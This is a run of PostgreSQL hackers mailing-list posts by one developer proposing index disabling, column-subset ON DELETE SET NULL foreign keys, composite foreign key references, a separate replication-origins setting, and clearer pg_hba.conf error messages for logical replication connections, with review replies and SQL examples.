PROPOSAL: Support global and local disabling of indexes

2022-03-17 Thread Paul Martinez
Hey, hackers,

Adding and removing indexes is a regular part of database maintenance,
but in a large database, removing an index can be a very risky operation.
Removing the wrong index could have disastrous consequences for
performance, and it could take tens of minutes, or even hours, to rebuild
the entire index.

I propose adding an ALTER INDEX command that can enable or disable an
index on a global level:

ALTER INDEX index_name ENABLE;
ALTER INDEX index_name DISABLE;

A disabled index is still updated, and still enforces constraints, but it
will not be used for queries.

Whether or not the index is disabled could also be specified at index
creation:

CREATE INDEX index_name ON table_name (col1, col2) ENABLED; -- default
CREATE INDEX index_name ON table_name (col1, col2) DISABLED;

This would be useful if a user anticipates index creation to take a long
time and they want to be able to carefully monitor the database once the
index starts getting used.

It would also be useful to be able to enable and disable indexes locally
in the context of a single session to easily and safely verify that a
query can still be executed efficiently without an index:

ALTER INDEX index_name DISABLE SESSION;

It might also be reasonable to "unset" any local override to what's
actually set on the index itself, but this would probably require slightly
different syntax: SET ENABLED = true / false / DEFAULT maybe?

I am unsure of how a user would query this information; maybe a function
like pg_disabled_index_overrides() ? The permanent state of an index
should be reflected in the output of \d  by appending 'DISABLED'
to disabled indexes.


The pg_index catalog entry currently includes a column `indisvalid` which
prevents queries from using the index, and this column can be set
explicitly, though not easily (it requires getting the oid of the index
relation from pg_class), and presumably not entirely safely. This column
contains significant semantic information about the state of the index, so
I don't think it makes sense to burden it with additional meaning that is
entirely user-dependent.

Supporting global enabling/disabling of an index could be accomplished
fairly simply by adding a `indisenabled` boolean flag to pg_index.
Updating this value would acquire an AccessExclusive lock on the index and
call an updated version of index_set_state_flags, which automatically
handles sending the cache invalidation message to other processes.
(Is this sufficient to also invalidate all cached query plans?)

The actual "disabling" part can be handled by adding disable_cost inside
the cost_index function in costsize.c, similar to how enable_indexscan is
handled.


Supporting session-local enabling/disabling of indexes is trickier. We can
keep track of the manual overrides in the backend process's local memory
as a very light-weight option. (A simple linked list would suffice.) But
we have to take extra care to keep this up-to-date. When an index is
dropped, any local overrides need to be dropped. It probably also makes
sense to mimic the behavior of SET SESSION, which will rollback any
changes made during a transaction if the transaction rolls back. (And if
we handle this, maybe it makes sense to support ENABLE / DISABLE LOCAL as
analogues of SET LOCAL as well.)

To handle persisting/rolling back changes we can add a new AtEOXact
function that gets called at the end of CommitTransaction and
AbortTransaction.

I'm less sure how to handle deleting entries when indexes are deleted by
other transactions (or especially by the same transaction). Could we use
CacheRegisterRelcacheCallback to be notified anytime the relcache is
updated and make sure all the indexes we have overrides for still exist?
When would that callback be executed relative to our own process? If the
backend isn't in a transaction, it would have to check for deleted indexes
right away, but if it is, we would have to wait for the end of the
transaction to update our list (possibly a job for
AtEOXact_UpdateDisabledIndexes?) Are they other parts of Postgres that
behave similarly?

A more heavy-weight option would be to actually store this info in a
catalog table, but that would add a lot of overhead to cost estimation
during query planning, so I don't think it's a great option.


Does this sound like a reasonable feature to add to Postgres? I feel like
it would make it a lot easier to manage large databases and debug some
query performance problems. There are definitely some details to iron out,
like the exact syntax, and a lot of implementation details I'm unsure of,
but if people support it I'd be glad to try to implement it.

Thanks!
Paul




Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-12-01 Thread Paul Martinez
On Wed, Nov 24, 2021 at 10:59 AM Peter Eisentraut
 wrote:
>
> I was looking through this example to see if it could be adapted for the
> documentation.
>
> The way the users table is defined, it appears that "id" is actually
> unique and the primary key ought to be just (id).  The DELETE command
> you show also just uses the id column to find the user, which would be
> bad if the user id is not unique across tenants.  If the id were unique,
> then the foreign key from posts to users would just use the user id
> column and the whole problem of the ON DELETE SET NULL action would go
> away.  If the primary key of users is indeed supposed to be (tenant_id,
> id), then maybe the definition of the users.id column should not use
> serial, and the DELETE command should also look at the tenant_id column.
> (The same question applies to posts.id.)
>
> Also, you initially wrote that this is a denormalized schema.  I think
> if we keep the keys the way you show, then this isn't denormalized.  But
> if we considered users.id globally unique, then there would be
> normalization concerns.
>
> What do you think?

Regarding that specific example, in a production scenario, yes, the
DELETE command should reference both columns. And if used for
documentation both columns should be referenced for clarity/correctness.

I don't think the exact semantics regarding the uniqueness of the id
column are critical. Configuring separate auto-incrementing ids per
tenant would be fairly complex; practically speaking, a single
database with multi-tenant data will use serial to get auto-incrementing
ids (or else use UUIDs to prevent conflicts). The possibility of
conflicting ids likely won't arise until moving to a distributed
environment, at which point queries should only be routed towards a
single shard (where uniqueness will still hold), either by some higher
level application-level context, or by including the tenant_id as part
of the query.

I think there are three separate motivating use cases for using
(tenant_id, id) as primary keys everywhere in a multi-tenant database:

1) I initially encountered this problem while migrating a database to use
Citus, which requires that primary keys (and any other uniqueness
constraints) include the shard key, which forces the primary key to be
(tenant_id, id). I'm not sure what constraints other sharding solutions
enforce, but I don't feel like this feature is over-fitting to Citus'
specific implementation -- it seems like a pretty
reasonable/generalizable solution when sharding data: prefix all your
indexes with the shard key.

2) As I mentioned in my response to Tom in my original proposal thread,
and as Matthias alluded to, using composite primary keys grants
significantly stronger referential integrity by preventing cross-tenant
references. I think this represents a significant leap in the robustness
and security of a schema, to the point where you could consider it a
design flaw to _not_ use composite keys.

https://www.postgresql.org/message-id/flat/CAF%2B2_SFFCjWMpxo0cj3yaqMavcb3Byd0bSG%2B0UPs7RVb8EF99g%40mail.gmail.com#c0e2b37b223bfbf8ece561f02865286c

3) For performance reasons, indexes on foreign keys will often be
prefixed by the tenant_id to speed up index scans. (I think
algorithmically doing an index lookup on (fk_id) vs. (tenant_id, fk_id)
has the same complexity, but repeated index scans, such as when doing a
join, should in practice be more efficient when including a tenant_id,
because most queries will only reference a single tenant so the looked
up values are more likely to be on the same pages.) If a foreign key
only references the id column, then ON DELETE CASCADE triggers will only
use the id column in their DELETE query. Thus, to ensure that deletes
are still fast, you will need to create an index on (fk_id) in addition
to the (tenant_id, fk_id) index, which would cause _significant_
database bloat. (In practice, the presence of both indexes will also
confuse the query planner and now BOTH indexes will take up precious
space in the database's working memory, so it really creates all sorts
of problems.) Using a composite foreign key will ensure that ON DELETE
CASCADE trigger query will use both columns.

- Paul




Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-11-22 Thread Paul Martinez
On Mon, Nov 22, 2021 at 10:21 PM Zhihong Yu  wrote:
>
> Hi,
> +   If a foreign key with a SET NULL or SET
> +   DEFAULT delete action, which columns should be updated.
>
> which columns should be updated -> the columns that should be updated

Done.

> +   if (fk_del_set_cols)
> +   {
> +   int num_delete_cols = 0;
>
> Since num_delete_cols is only used in the else block, I think it can be moved 
> inside else block.
> Or you can store the value inside *num_fk_del_set_cols directly and avoid 
> num_delete_cols.

I've moved it inside the else block (and removed the initialization).

Updated patch attached. Thanks for taking a look so quickly!

- Paul


referential-actions-on-delete-only-set-cols-v5.patch
Description: Binary data


Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-11-22 Thread Paul Martinez
On Thu, Nov 11, 2021 at 4:34 AM Peter Eisentraut
 wrote:
>
> I have reviewed your patch
> referential-actions-on-delete-only-set-cols-v3.patch.  Attached are two
> patches that go on top of yours that contain my recommended changes.
>
> Basically, this all looks pretty good to me.  My changes are mostly
> stylistic.

Thank you! I really, really appreciate the thorough review and the
comments and corrections.

> Some notes of substance:
>
> - The omission of the referential actions details from the CREATE TABLE
> reference page surprised me.  I have committed that separately (without
> the column support, of course).  So you should rebase your patch on top
> of that.  Note that ALTER TABLE would now also need to be updated by
> your patch.

Done.

> - I recommend setting pg_constraint.confdelsetcols to null for the
> default behavior of setting all columns, instead of an empty array the
> way you have done it.  I have noted the places in the code that need to
> be changed for that.

Done.

> - The outfuncs.c support shouldn't be included in the final patch.
> There is nothing wrong it, but I don't think it should be part of this
> patch to add piecemeal support like that.  I have included a few changes
> there anyway for completeness.

Got it. I've reverted the changes in that file.

> - In ri_triggers.c, I follow your renaming of the constants, but
> RI_PLAN_ONTRIGGER_RESTRICT seems a little weird.  Maybe do _ONBOTH_, or
> else reverse the order, like RI_PLAN_SETNULL_ONDELETE, which would then
> allow RI_PLAN_RESTRICT.

I've reversed the order, so it's now RI_PLAN__, and
renamed the RESTRICT one to just RI_PLAN_RESTRICT.


I've attached an updated patch, including your changes and the additional
changes mentioned above.

- Paul


referential-actions-on-delete-only-set-cols-v4.patch
Description: Binary data


Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-10-26 Thread Paul Martinez
On Thu, Sep 2, 2021 at 1:55 PM Zhihong Yu  wrote:
>
> Hi,
> +   case RI_TRIGTYPE_DELETE:
> +   queryno = is_set_null
> +   ? RI_PLAN_ONDELETE_SETNULL_DOUPDATE
> +   : RI_PLAN_ONDELETE_SETDEFAULT_DOUPDATE;
>
> Should the new symbols be renamed ?
>
> RI_PLAN_ONDELETE_SETNULL_DOUPDATE -> RI_PLAN_ONDELETE_SETNULL_DODELETE
> RI_PLAN_ONDELETE_SETDEFAULT_DOUPDATE -> RI_PLAN_ONDELETE_SETDEFAULT_DODELETE

These constants are named correctly -- they follow the format:

RI_PLAN___

These symbols refer to plans that are used for ON DELETE SET NULL
and ON DELETE SET DEFAULT triggers, which update rows in the referencing
table ("_DOUPDATE"). These triggers do not perform any deletions.


But these names are definitely confusing, and I did have to spend some time
confirming that the names were correct. I decided to rename these, as well as
the other plan keys, so they all use the same more explicit format:

RI_PLAN__

RI_PLAN_CASCADE_DEL_DODELETE => RI_PLAN_ONDELETE_CASCADE
RI_PLAN_CASCADE_UPD_DOUPDATE => RI_PLAN_ONUPDATE_CASCADE

RI_PLAN_RESTRICT_CHECKREF=> RI_PLAN_ONTRIGGER_RESTRICT

RI_PLAN_SETNULL_DOUPDATE => RI_PLAN_ONDELETE_SETNULL
and RI_PLAN_ONUPDATE_SETNULL

RI_PLAN_SETDEFAULT_DOUPDATE  => RI_PLAN_ONDELETE_SETDEFAULT
and RI_PLAN_ONUPDATE_SETDEFAULT

The same plan can be used for both ON DELETE RESTRICT and ON UPDATE RESTRICT,
so we just use ONTRIGGER there. Previously, the same plan could also be
used for both ON DELETE SET NULL and ON UPDATE SET NULL, or both
ON DELETE SET DEFAULT and ON UPDATE SET DEFAULT. This is no longer the case,
so we need to add separate keys for each case. As an example, a constraint on
a table foo could specify:

FOREIGN KEY (a, b) REFERENCES bar (a, b)
  ON UPDATE SET NULL
  ON DELETE SET NULL (a)

In this case for the update trigger we want to do:

UPDATE foo SET a = NULL, B = NULL WHERE ...

but for the delete trigger we want to do:

UPDATE foo SET a = NULL WHERE ...

so the plans cannot be shared.

(Note that we still need separate plans even if we only support specifying
a column subset for the ON DELETE trigger. As in the above example, the
ON UPDATE trigger will always set all the columns, while the ON DELETE trigger
could only set a subset.)


- Paul


referential-actions-set-cols-v4.patch
Description: Binary data


referential-actions-on-delete-only-set-cols-v3.patch
Description: Binary data


Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-09-02 Thread Paul Martinez
On Wed, Sep 1, 2021 at 4:11 AM Daniel Gustafsson  wrote:

> This patch no longer applies, can you please submit a rebased version?  It
> currently fails on catversion.h, to keep that from happening repeatedly you 
> can
> IMO skip that from the patch submission.

Ah, understood. Will do that in the future. Attached are rebased patches, not
including catversion.h changes, for both the ON UPDATE/DELETE case, and the
ON DELETE only case.

- Paul


referential-actions-set-cols-v3.patch
Description: Binary data


referential-actions-on-delete-only-set-cols-v2.patch
Description: Binary data


Re: Allow composite foreign keys to reference a superset of unique constraint columns?

2021-08-17 Thread Paul Martinez
On Tue, Aug 17, 2021 at 8:41 AM Jack Christensen  wrote:
>
> The only way to ensure a user can only be a member of a group in the same
> tenant is to user_group_memberships.tenant_id be part of the foreign key. And
> that will only work with a unique key on id and tenant_id in both users and
> user_groups. It's a bit inelegant to create multiple extra indexes to ensure
> consistency when existing indexes are enough to ensure uniqueness.
>
> Jack

You could accomplish this by using composite primary keys on the users and
user_groups tables:

CREATE TABLE users (
  id serial,
  tenant_id int REFERENCES tenants(id),
  PRIMARY KEY (tenant_id, id)
);

This approach works pretty well for multi-tenant databases, because then your
indexes all start with tenant_id, which should help with performance, and, in
theory, would make your database easier to shard. But then it requires
including a tenant_id in *every* query (and subquery!), which may be difficult
to enforce in a codebase.

One downside of the composite primary/foreign key approach is that ON DELETE
SET NULL foreign keys no longer work properly because they try to set both
columns to NULL, the true foreign key id, AND the shared tenant_id that is part
of the referencing table's primary key. I have a patch [1] out to add new
functionality to solve this problem though.

- Paul

[1]: 
https://www.postgresql.org/message-id/flat/CACqFVBZQyMYJV%3DnjbSMxf%2BrbDHpx%3DW%3DB7AEaMKn8dWn9OZJY7w%40mail.gmail.com




Allow composite foreign keys to reference a superset of unique constraint columns?

2021-08-16 Thread Paul Martinez
Hey, hackers!

While working with some foreign keys, I noticed some mildly unexpected
behavior. The columns referenced by a unique constraint must naturally
have a unique constraint on them:

CREATE TABLE foo (a integer);
CREATE TABLE bar (x integer REFERENCES foo(a));
> ERROR:  there is no unique constraint matching given keys for referenced
  table "foo"

But Postgres doesn't allow a foreign key to reference a set of columns
without a unique constraint, even if there a unique constraint on a
subset of those columns (i.e., it doesn't allow referencing a superset
of a unique constraint).

CREATE TABLE foo (a integer PRIMARY KEY, b integer);
CREATE TABLE bar (x integer, y integer, FOREIGN KEY (x, y) REFERENCES
foo(a, b));
> ERROR:  there is no unique constraint matching given keys for referenced
  table "foo"

It seems to me like there would be nothing wrong in this case to allow this
foreign key constraint to exist. Because there is a unique constraint on foo(a),
foo(a, b) will also be unique. And it doesn't seem like it would be too complex
to implement.

Neither MATCH SIMPLE nor MATCH FULL constraints would have any issues
with this. MATCH PARTIAL may, but, alas, it's not implemented. (I've had
a few ideas about foreign keys, and MATCH PARTIAL seems to always come
up, and I still don't understand what its use case is.)




A real-world use case that uses denormalization could run into this. Imagine a
naive music database that has a list of artists, albums, and songs, where each
album is by one artist and each song is on one album, but we still store a
reference to the artist on each song:

CREATE TABLE artists (id serial PRIMARY KEY, name text);
CREATE TABLE albums (id serial PRIMARY KEY, artist_id REFERENCES
artists(id) name text);
CREATE TABLE songs (
  id serial PRIMARY KEY,
  artist_id REFERENCES artists(id) ON DELETE CASCADE,
  album_id REFERENCES albums(id) ON DELETE CASCADE,
  name text,
);

To ensure that artist deletions are fast, we need to create an index on
songs(artist_id) and songs(album_id). But, suppose we wanted to save on index
space, and we never needed to query JUST by album_id. We could then do:

CREATE TABLE songs (
  id serial PRIMARY KEY,
  artist_id REFERENCES artists(id) ON DELETE CASCADE,
  album_id integer,
  name text,
  FOREIGN KEY (artist_id, album_id) REFERENCES albums(artist_id, id)
ON DELETE CASCADE
);

And then we could have a single index on songs(artist_id, album_id) that would
serve both ON CASCADE DELETE triggers:

-- Delete artist
DELETE FROM songs WHERE artist_id = ;
-- Delete artist
DELETE FROM songs
  WHERE artist_id =  AND album_id = ;

But Postgres wouldn't let us create the composite foreign key described.



It seems like a somewhat useful feature. If people think it would be useful to
implement, I might take a stab at it when I have time.

- Paul




Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-08-04 Thread Paul Martinez
On Wed, Jul 14, 2021 at 6:51 AM Peter Eisentraut
 wrote:
> I think this is an interesting feature with a legitimate use case.

Great! I'm glad to hear that.

> Consider what should happen when you update users.id.  Per SQL standard,
> for MATCH SIMPLE an ON UPDATE SET NULL should only set to null the
> referencing column that corresponds to the referenced column actually
> updated, not all of them.  PostgreSQL doesn't do this, but if it did,
> then this would work just fine.
>
> ...
>
> So, unless I'm missing an angle here, I would suggest leaving out the ON
> UPDATE variant of this feature.

I understand what you're saying here, but are you sure that is the
behavior specified in the SQL standard?

I can't find a copy of a more recent standard, but at least in SQL 1999 [1],
it has this to say (page 459 of the linked PDF, page 433 of the standard):

> 8) If a non-null value of a referenced column in the referenced table is
>updated to a value that is distinct from the current value of that
>column, then for every member F of the subtable family of the
>referencing table:
>
>   Case:
>   a) If SIMPLE is specified or implicit, or if FULL is specified, then
>
> Case:
> ii) If the  specifies SET NULL, then
>
>   Case:
>   1) If SIMPLE is specified or implicit, then:
>
> A) 
>
> B) For every F, in every matching row in F, each referencing
> column in F that corresponds with a referenced column is set to
> the null value.

This phrasing doesn't seem to make any reference to which columns were
actually updated.

The definitions a few pages earlier do explicitly define the set of
updated columns ("Let UMC be the set of referencing columns that
correspond with updated referenced columns"), but that defined set is
only referenced in the behavior when PARTIAL is specified, implying that
the set of updated columns is _not_ relevant in the SIMPLE case.


If my understanding of this is correct, then Postgres _isn't_ out of spec,
and this extension still works fine for the ON UPDATE triggers. (But, wow,
this spec is not easy to read, so I could definitely be wrong.)

I'm not sure how MATCH PARTIAL fits into this; I know it's
unimplemented, but I don't know what its use cases are, and I don't
think I understand how ON DELETE / ON UPDATE should work with MATCH
PARTIAL, let alone how they would work combined with this extension.

This lack of clarity may be a good-enough reason to leave out the ON
UPDATE case.

On Wed, Jul 14, 2021 at 12:36 PM Ibrar Ahmed  wrote:
> Patch does not apply on head, I am marking the status "Waiting on author"
> http://cfbot.cputube.org/patch_33_2932.log

I've rebased my original patch and it should work now. This is
referential-actions-set-cols-v2.patch.

I've also created a second patch that leaves out the ON UPDATE behavior, if
we think that's the safer route. This is
referential-actions-on-delete-only-set-cols-v1.patch.

[1]: http://web.cecs.pdx.edu/~len/sql1999.pdf

On Wed, Jul 14, 2021 at 12:36 PM Ibrar Ahmed  wrote:
>
>
>
> On Wed, Jul 14, 2021 at 6:51 PM Peter Eisentraut 
>  wrote:
>>
>>
>> On 05.01.21 22:40, Paul Martinez wrote:
>> > I've created a patch to better support referential integrity constraints 
>> > when
>> > using composite primary and foreign keys. This patch allows creating a 
>> > foreign
>> > key using the syntax:
>> >
>> >FOREIGN KEY (tenant_id, fk_id) REFERENCES fktable ON DELETE SET NULL 
>> > (fk_id)
>> >
>> > which means that only the fk_id column will be set to NULL when the 
>> > referenced
>> > row is deleted, rather than both the tenant_id and fk_id columns.
>>
>> I think this is an interesting feature with a legitimate use case.
>>
>> I'm wondering a bit about what the ON UPDATE side of this is supposed to
>> mean.  Consider your example:
>>
>> > CREATE TABLE tenants (id serial PRIMARY KEY);
>> > CREATE TABLE users (
>> >tenant_id int REFERENCES tenants ON DELETE CASCADE,
>> >id serial,
>> >PRIMARY KEY (tenant_id, id),
>> > );
>> > CREATE TABLE posts (
>> >  tenant_id int REFERENCES tenants ON DELETE CASCADE,
>> >  id serial,
>> >  author_id int,
>> >  PRIMARY KEY (tenant_id, id),
>> >  FOREIGN KEY (tenant_id, author_id) REFERENCES users ON DELETE SET NULL
>> > );
>> >
>> > INSERT INTO tenants VALUES (1);
>> > INSERT INTO users VALUES (1, 101);
>> > INSERT INTO posts VALUES (1, 201, 101);
>> > DELETE FROM users WHERE id = 101;
>> > E

Re: [PATCH] Note effect of max_replication_slots on subscriber side in documentation.

2021-02-26 Thread Paul Martinez
On Fri, Feb 26, 2021 at 5:22 AM Amit Kapila  wrote:
>
> https://www.postgresql.org/docs/devel/logical-replication-config.html
>

Ah, yep. I added a clause to the end of the sentence to clarify why we're
using max_replication_slots here:

- The subscriber also requires the max_replication_slots to be set.

+ The subscriber also requires that max_replication_slots be set to
+ configure how many replication origins can be tracked.

>
> Okay, that makes sense. However, I have sent a patch today (see [1])
> where I have slightly updated the subscriber-side configuration
> paragraph. From PG-14 onwards, table synchronization workers also use
> origins on subscribers, so you might want to adjust.
>
> ...
>
> I guess we can leave adding GUC to some other day as that might
> require a bit broader acceptance and we are already near to the start
> of last CF. I think we can still consider it if we few more people
> share the same opinion as yours.
>

Great. I'll wait to update the GUC patch until your patch and/or my
doc-only patch get merged. Should I add it to the March CF?

Separate question: are documentation updates like these ever backported
to older versions that are still supported? And if so, would the changes
be reflected immediately, or would they require a minor point release?
When I was on an older release I found that I'd jump back and forth
between the version I was using and the latest version to see if
anything had changed.


- Paul


max_replication_slots_subscriber_doc_v01.diff
Description: Binary data


Re: [PATCH] Note effect of max_replication_slots on subscriber side in documentation.

2021-02-26 Thread Paul Martinez
On Thu, Feb 25, 2021 at 5:31 AM Amit Kapila  wrote:
>
> For docs only patch, I have few suggestions:
> 1. On page [1], it is not very clear that we are suggesting to set
> max_replication_slots for origins whereas your new doc patch has
> clarified it, can we update the other page as well.

Sorry, what other page are you referring to?


> 2.
> Setting it a lower value than the current
> + number of tracked replication origins (reflected in
> +  linkend="view-pg-replication-origin-status">pg_replication_origin_status,
> + not  linkend="catalog-pg-replication-origin">pg_replication_origin)
> + will prevent the server from starting.
> +
>
> Why can't we just mention pg_replication_origin above?
>

So this is slightly confusing:

pg_replication_origin just contains mappings from origin names to oids.
It is regular catalog table and has no limit on its size. Users can also
manually insert rows into this table.

https://www.postgresql.org/docs/13/catalog-pg-replication-origin.html

The view showing the in-memory information is actually
pg_replication_origin_status. The number of entries here is what is
actually constrained by the GUC parameter.

https://www.postgresql.org/docs/13/view-pg-replication-origin-status.html

I clarified pointing to pg_replication_origin_status because it could in
theory be out of sync with pg_replication_origin. I'm actually not sure
how entries there are managed. Perhaps if you were replicating from one
database and then stopped and started replicating from another database
you'd have two replication origins, but only one replication origin
status?


This also brings up a point regarding the naming of the added GUC.
max_replication_origins is cleanest, but has this confusion regarding
pg_replication_origin vs. pg_replication_origin_status.
max_replication_origin_statuses is weird (and long).
max_tracked_replication_origins is a possibility?

(One last bit of naming confusion; the internal code refers to them as
ReplicationStates, rather than ReplicationOrigins or
ReplicationOriginStatuses, or something like that.)


- Paul




Re: [PATCH] Note effect of max_replication_slots on subscriber side in documentation.

2021-02-24 Thread Paul Martinez
Hey, all,

I went ahead and made a patch for introducing a new GUC variable,
max_replication_origins, to replace the awkward re-use of
max_replication_slots.

I'm mostly indifferent whether a new GUC variable is necessary, or
simply just updating the existing documentation (the first patch I
sent) is sufficient, but one of them should definitely be done to
clear up the confusion.

- Paul

On Tue, Feb 16, 2021 at 1:03 PM Paul Martinez  wrote:

> Hey, all,
>
> The configuration parameter max_replication_slots is most notably used
> to control how many replication slots can be created on a server, but it
> also controls how many replication origins can be tracked on the
> subscriber side.
>
> This is noted in the Configuration Settings section in the Logical
> Replication Chapter [1], but it is not mentioned in the documentation
> the parameter itself [2].
>
> The attached patch adds an extra paragraph explaining its effect on
> subscribers.
>
>
> Using max_replication_slots for sizing the number available of
> replication origin states is a little odd, and is actually noted twice
> in the source code [3] [4]:
>
> > XXX: Should we use a separate variable to size this rather than
> > max_replication_slots?
>
> > XXX: max_replication_slots is arguably the wrong thing to use, as here
> > we keep the replay state of *remote* transactions. But for now it
> > seems sufficient to reuse it, rather than introduce a separate GUC.
>
> This is a different usage of max_replication_slots than originally
> intended, managing resource usage on the subscriber side, rather than
> the provider side. This manifests itself in the awkwardness of the
> documentation, where max_replication_slots is only listed in the Sending
> Server section, and not mentioned in the Subscribers section.
>
> Given this, I think introducing a new parameter would make sense
> (max_replication_origins? slightly confusing because there's no limit on
> the number of records in pg_replication_origins; tracking of replication
> origins is displayed in pg_replication_origin_status).
>
> I'd be happy to make a patch for a new GUC parameter, if people think
> it's worth it to separate the functionality. Until then, however, the
> addition to the documentation should help prevent confusion.
>
>
> - Paul
>
> [1]: https://www.postgresql.org/docs/13/logical-replication-config.html
> [2]:
> https://www.postgresql.org/docs/13/runtime-config-replication.html#GUC-MAX-REPLICATION-SLOTS
> [3]:
> https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/replication/logical/origin.c;h=685eaa6134e7cad193b583ff28284d877a6d8055;hb=HEAD#l162
> [4]:
> https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/replication/logical/origin.c;h=685eaa6134e7cad193b583ff28284d877a6d8055;hb=HEAD#l495
>


max_replication_origins_v00.diff
Description: Binary data


[PATCH] Note effect of max_replication_slots on subscriber side in documentation.

2021-02-16 Thread Paul Martinez
Hey, all,

The configuration parameter max_replication_slots is most notably used
to control how many replication slots can be created on a server, but it
also controls how many replication origins can be tracked on the
subscriber side.

This is noted in the Configuration Settings section in the Logical
Replication Chapter [1], but it is not mentioned in the documentation
the parameter itself [2].

The attached patch adds an extra paragraph explaining its effect on
subscribers.


Using max_replication_slots for sizing the number available of
replication origin states is a little odd, and is actually noted twice
in the source code [3] [4]:

> XXX: Should we use a separate variable to size this rather than
> max_replication_slots?

> XXX: max_replication_slots is arguably the wrong thing to use, as here
> we keep the replay state of *remote* transactions. But for now it
> seems sufficient to reuse it, rather than introduce a separate GUC.

This is a different usage of max_replication_slots than originally
intended, managing resource usage on the subscriber side, rather than
the provider side. This manifests itself in the awkwardness of the
documentation, where max_replication_slots is only listed in the Sending
Server section, and not mentioned in the Subscribers section.

Given this, I think introducing a new parameter would make sense
(max_replication_origins? slightly confusing because there's no limit on
the number of records in pg_replication_origins; tracking of replication
origins is displayed in pg_replication_origin_status).

I'd be happy to make a patch for a new GUC parameter, if people think
it's worth it to separate the functionality. Until then, however, the
addition to the documentation should help prevent confusion.


- Paul

[1]: https://www.postgresql.org/docs/13/logical-replication-config.html
[2]: 
https://www.postgresql.org/docs/13/runtime-config-replication.html#GUC-MAX-REPLICATION-SLOTS
[3]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/replication/logical/origin.c;h=685eaa6134e7cad193b583ff28284d877a6d8055;hb=HEAD#l162
[4]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/replication/logical/origin.c;h=685eaa6134e7cad193b583ff28284d877a6d8055;hb=HEAD#l495


max_replication_slots_subscriber_doc_v00.diff
Description: Binary data


Re: [PATCH] pg_hba.conf error messages for logical replication connections

2021-02-16 Thread Paul Martinez
On Tue, Feb 16, 2021 at 2:22 AM Amit Kapila  wrote:
>
> I don't think we need to update the error messages, it makes the code
> a bit difficult to parse without much benefit. How about just adding
> errdetail? See attached and let me know what you think?
>

Yeah, I think that looks good. Thanks!

- Paul




Re: [PATCH] pg_hba.conf error messages for logical replication connections

2021-02-01 Thread Paul Martinez
On Fri, Jan 29, 2021 at 8:41 PM Amit Kapila  wrote:
>
> Yeah, hints or more details might improve the situation but I am not
> sure we want to add more branching here. Can we write something
> similar to HOSTNAME_LOOKUP_DETAIL for hints? Also, I think what you
> are proposing to write is more of a errdetail kind of message. See
> more error routines in the docs [1].
>

Alright, I've updated both sets of error messages to use something like
HOSTNAME_LOOKUP_DETAIL, both for the error message itself, and for the
extra detail message about the replication keyword. Since now we specify
both an errdetail (sent to the client) and an errdetail_log (sent to the
log), I renamed HOSTNAME_LOOKUP_DETAIL to HOSTNAME_LOOKUP_DETAIL_LOG.

- Paul


pg_hba_conf_error_message_patch_v01.diff
Description: Binary data


Re: [PATCH] pg_hba.conf error messages for logical replication connections

2021-01-30 Thread Paul Martinez
On Thu, Jan 28, 2021 at 8:17 PM Amit Kapila  wrote:
>
> What exactly are you bothered about here? Is the database name not
> present in the message your concern or the message uses 'replication'
> but actually it doesn't relate to 'replication' specified in
> pg_hba.conf your concern? I think with the current scheme one might
> say that replication word in error message helps them to distinguish
> logical replication connection error from a regular connection error.
> I am not telling what you are proposing is wrong but just that the
> current scheme of things might be helpful to some users. If you can
> explain a bit how the current message misled you and the proposed one
> solves that confusion that would be better?
>

My main confusion arose from conflating the word "replication" in the
error message with the "replication" keyword in pg_hba.conf.

In my case, I was actually confused because I was creating logical
replication connections that weren't getting rejected, despite a lack
of any "replication" rules in my pg_hba.conf. I had the faulty
assumption that replication connection requires "replication" keyword,
and my change to the documentation makes it explicit that logical
replication connections do not match the "replication" keyword.

I was digging through the code trying to understand why it was working,
and also making manual connections before I stumbled upon these error
messages.

The fact that the error message doesn't include the database name
definitely contributed to my confusion. It only mentions the word
"replication", and not a database name, and that reinforces the idea
that the "replication" keyword rule should apply, because it seems
"replication" has replaced the database name.

But overall, I would agree that the current messages aren't wrong,
and my fix could still cause confusion because now logical replication
connections won't be described as "replication" connections.

How about explicitly specifying physical vs. logical replication in the
error message, and also adding hints for clarifying the use of
the "replication" keyword in pg_hba.conf?

if physical replication
  Error "pg_hba.conf rejects physical replication connection ..."
  Hint "Physical replication connections only match pg_hba.conf rules
using the "replication" keyword"
else if logical replication
  Error "pg_hba.conf rejects logical replication connection to database %s ..."
  // Maybe add this?
  Hint "Logical replication connections do not match pg_hba.conf rules
using the "replication" keyword"
else
  Error "pg_hba.conf rejects connection to database %s ..."

If I did go with this approach, would it be better to have three
separate branches, or to just introduce another variable for the
connection type? I'm not sure what is optimal for translation. (If both
types of replication connections get hints then probably three branches
is better.)

const char *connection_type;

connection_type =
  am_db_walsender ? _("logical replication connection") :
  am_walsender ? _("physical replication connection") :
  _("connection")


- Paul




[PATCH] pg_hba.conf error messages for logical replication connections

2021-01-28 Thread Paul Martinez
Hey, all,

When creating a logical replication connection that isn't allowed by the
current pg_hba.conf, the error message states that a "replication
connection" is not allowed.

This error message is confusing because although the user is trying to
create a replication connection and specified "replication=database" in
the connection string, the special "replication" pg_hba.conf keyword
does not apply. I believe the error message should just refer to a
regular connection and specify the database the user is trying to
connect to.

When connecting using "replication" in a connection string, the variable
am_walsender is set to true. When "replication=database" is specified,
the variable am_db_walsender is also set to true [1].

When checking whether a pg_hba.conf rule matches in libpq/hba.c, we only
check for the "replication" keyword when am_walsender && !am_db_walsender [2].

But then when reporting error messages in libpq/auth.c, only
am_walsender is used in the condition that chooses whether to specify
"replication connection" or "connection" to a specific database in the
error message [3] [4].

In this patch I have modified the conditions in libpq/auth.c to check
am_walsender && !am_db_walsender, as in hba.c. I have also added a
clarification in the documentation for pg_hba.conf.

>   The value `replication` specifies that the record matches if a
>   physical replication connection is requested (note that replication
> - connections do not specify any particular database).
> + connections do not specify any particular database), but it does not
> + match logical replication connections that specify
> + `replication=database` and a `dbname` in their connection string.

Thanks,
Paul

[1]: 
